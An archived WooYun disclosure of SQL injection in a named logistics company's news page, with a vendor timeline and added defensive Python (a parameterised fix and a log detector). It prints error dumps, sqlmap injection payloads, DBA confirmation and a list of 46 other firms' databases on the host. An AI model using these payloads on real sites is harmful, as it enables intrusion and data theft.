WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2014-08-11: Details reported to the vendor, awaiting vendor response
2014-08-16: Vendor confirmed; details disclosed to the vendor only
2014-08-26: Details disclosed to core white hats and relevant domain experts
2014-09-05: Details disclosed to regular white hats
2014-09-15: Details disclosed to intern white hats
2014-09-25: Details disclosed to the public
As the title says: root privileges, and a database dump covering multiple logistics companies; the database names map directly to www.<database name>.com.
Site: www.szpsun56.com. A SQL error reveals the server path:
http://www.szpsun56.com/news/html/?518.html
Append a backslash and the page errors out:
Database error: Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\' limit 0,1' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1) called at [D:\web\yewu\苏州排尚物流\includes\db.inc.php:55]
#1 dbbase_sql->query(select * from {P}_news_con where id='518\' limit 0,1) called at [D:\web\yewu\苏州排尚物流\news\includes\news.inc.php:36]
#2 NewsToUrl() called at [D:\web\yewu\苏州排尚物流\news\html\index.php:8]
Database error: Invalid SQL: select title from pwn_news_con where id='518\'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select title from pwn_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\includes\db.inc.php:55]
#1 dbbase_sql->query(select title from {P}_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\news\module\NewsNavPath.php:101]
#2 NewsNavPath() called at [D:\web\yewu\苏州排尚物流\includes\common.inc.php:524]
#3 PrintPage() called at [D:\web\yewu\苏州排尚物流\news\html\index.php:15]
Database error: Invalid SQL: select * from pwn_news_con where id='518\'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\includes\db.inc.php:55]
#1 dbbase_sql->query(select * from {P}_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\news\module\NewsContent.php:34]
#2 NewsContent() called at [D:\web\yewu\苏州排尚物流\includes\common.inc.php:524]
#3 PrintPage() called at [D:\web\yewu\苏州排尚物流\news\html\index.php:15]
Rewrite the URL as:
http://www.szpsun56.com/news/html/index.php?id=518
Looks like a PHPWeb hole. The vendor pushed a patch last time that filters single quotes, so now it all comes through as %27... Where the single quote can't be used directly, see the single-quote bypass techniques. The privileges are a bit on the high side.
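As an added illustration (not part of the original report, and not the site's own code), the pattern behind the error dump above modelled with Python's sqlite3: a query built by pasting the `id` parameter into the SQL text, beside a version that validates the id as an integer, binds it as a parameter, and keeps driver error text server-side instead of echoing file paths and table names to the browser. The table name, rows and function names are constructed stand-ins. SQLite, unlike MySQL, does not treat a backslash in a string literal as an escape, so the trailing-backslash input from the report does not raise a syntax error here; the appended true/false conditions show the difference instead.

```python
import logging
import sqlite3

log = logging.getLogger("news")


def make_db():
    # Constructed in-memory stand-in for the site's news table; not real data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news_con (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news_con VALUES (?, ?)",
        [(517, "first"), (518, "second"), (519, "third")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    # The pattern the error dump reveals: the request parameter becomes part of
    # the SQL text, so whatever it contains is parsed as SQL. Stripping or
    # escaping quotes afterwards still leaves the value inside the grammar.
    sql = "SELECT title FROM news_con WHERE id='%s' LIMIT 0,1" % raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_fixed(conn, raw_id):
    # Hardened form: validate the id as an integer up front, bind it as a
    # parameter, and never hand driver error text (which on the real site
    # exposed file paths and table names) back to the caller.
    try:
        ident = int(raw_id)
    except (TypeError, ValueError):
        return None
    try:
        row = conn.execute(
            "SELECT title FROM news_con WHERE id=? LIMIT 1", (ident,)
        ).fetchone()
    except sqlite3.Error as exc:
        log.error("news lookup failed: %s", exc)  # detail stays server-side
        return None
    return row[0] if row else None


def differs_on_condition(lookup, conn):
    # Regression check a defender can keep in the test suite: if a true and a
    # false appended condition give different answers, the parameter is being
    # interpreted as SQL. The inputs mirror the shape seen in the report.
    truthy = lookup(conn, "518' AND 1=1 AND 'a'='a")
    falsy = lookup(conn, "518' AND 1=2 AND 'a'='a")
    return truthy != falsy


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup reacts to injected condition:",
          differs_on_condition(lookup_vulnerable, db))
    print("fixed lookup reacts to injected condition:",
          differs_on_condition(lookup_fixed, db))
```

The integer cast alone would already close this particular hole, but binding the value as a parameter is the habit to keep for every column type; the quote filter the author mentions is a blacklist, and blacklists leave the value inside the SQL grammar.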
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA: True
[19:20:42] [INFO] retrieved: "",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system user
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=518' AND 8992=8992 AND 'SvZD'='SvZD

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=518' AND (SELECT 2420 FROM(SELECT COUNT(*),CONCAT(0x716f646871,(SELECT (CASE WHEN (2420=2420) THEN 1 ELSE 0 END)),0x7162676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XPfj'='XPfj

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=-5917' UNION ALL SELECT CONCAT(0x716f646871,0x66646d46727573796d4b,0x7162676d71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=518' AND SLEEP(5) AND 'cxmb'='cxmb
---
[19:11:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [46]:
[*] 021jadever
[*] 0551kyaji
[*] 0817jp
[*] 0817yt
[*] aaa
[*] abc
[*] baiqiang
[*] ceshi
[*] dataiyaojt
[*] df999pme
[*] fsmbhj
[*] fsrattanjiaju
[*] gjlpf
[*] huaan56
[*] information_schema
[*] jadever021
[*] kmxydn
[*] men
[*] menjing
[*] minshi56
[*] mysql
[*] nchszs
[*] nczxsj
[*] qiyezhan
[*] sdyspme
[*] shoulianqingxin
[*] sjgzs
[*] suheng
[*] sz56at
[*] sz56stg
[*] szjl56
[*] szksdwl
[*] szpsun56
[*] szta
[*] szta56
[*] szxdwl
[*] szxt56
[*] tengyi
[*] test
[*] tfpme
[*] wordpress
[*] wxjz56
[*] xiaoai
[*] yiliao
[*] zssj
[*] ztuowl
.......
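A defender-side complement, added here and not part of the original report: detection logic that runs over constructed web-access-log lines shaped like the probes listed in the sqlmap output above. It decodes the percent-encoding (the %27 form the author mentions), tags each request by technique family, and flags a source that exercises several families against the site. The log lines, client addresses, signature table and function names are all constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines in common log format; the request shapes follow
# the boolean, time-based and UNION probes shown in the sqlmap output.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Aug/2014:19:11:24 +0800] "GET /news/html/index.php?id=518 HTTP/1.1" 200 5120
192.0.2.10 - - [11/Aug/2014:19:11:25 +0800] "GET /news/html/index.php?id=518%27%20AND%208992%3D8992%20AND%20%27SvZD%27%3D%27SvZD HTTP/1.1" 200 5120
192.0.2.10 - - [11/Aug/2014:19:11:26 +0800] "GET /news/html/index.php?id=518%27%20AND%20SLEEP(5)%20AND%20%27cxmb%27%3D%27cxmb HTTP/1.1" 200 5120
192.0.2.10 - - [11/Aug/2014:19:11:27 +0800] "GET /news/html/index.php?id=-5917%27%20UNION%20ALL%20SELECT%20CONCAT(0x716f646871,0x7162676d71)%23 HTTP/1.1" 200 5120
198.51.100.7 - - [11/Aug/2014:19:12:01 +0800] "GET /news/html/?518.html HTTP/1.1" 200 5120
"""

# client ip, ident, user, [timestamp], "METHOD path HTTP/x.y"
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"'
)

# Each signature is named after the sqlmap technique family it corresponds to.
SIGNATURES = {
    "boolean": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "time": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "error": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    "schema": re.compile(r"information_schema", re.I),
}


def classify_request(path):
    # Decode percent-encoding once so %27/%20 forms match exactly like literal
    # quotes and spaces would.
    decoded = unquote(path)
    return sorted(tag for tag, rx in SIGNATURES.items() if rx.search(decoded))


def scan_log(text):
    # Returns (line number, client ip, technique tags) for every flagged line.
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        tags = classify_request(path)
        if tags:
            hits.append((lineno, ip, tags))
    return hits


def suspicious_sources(text, min_families=2):
    # A client that exercises several technique families against one host is
    # far more likely an automated scanner than a stray quote in a search box;
    # those are the sources worth an alert.
    seen = defaultdict(set)
    for _, ip, tags in scan_log(text):
        seen[ip].update(tags)
    return {ip: sorted(t) for ip, t in seen.items() if len(t) >= min_families}


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(suspicious_sources(SAMPLE_LOG))
```

The per-line tags are noisy on their own (a legitimate search for "union select" would trip the union signature), which is why the source-level aggregation does the alerting; pair it with the application's own 500/database-error counts, since the verbose errors shown earlier in this report are the other half of the signal.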
Severity: High
Vulnerability Rank: 14
Confirmed: 2014-08-16 08:34
2014-08-20: Update on handling: CNVD confirmed and reproduced the reported issue and has notified the site's administrators by email through the site's public contact channels.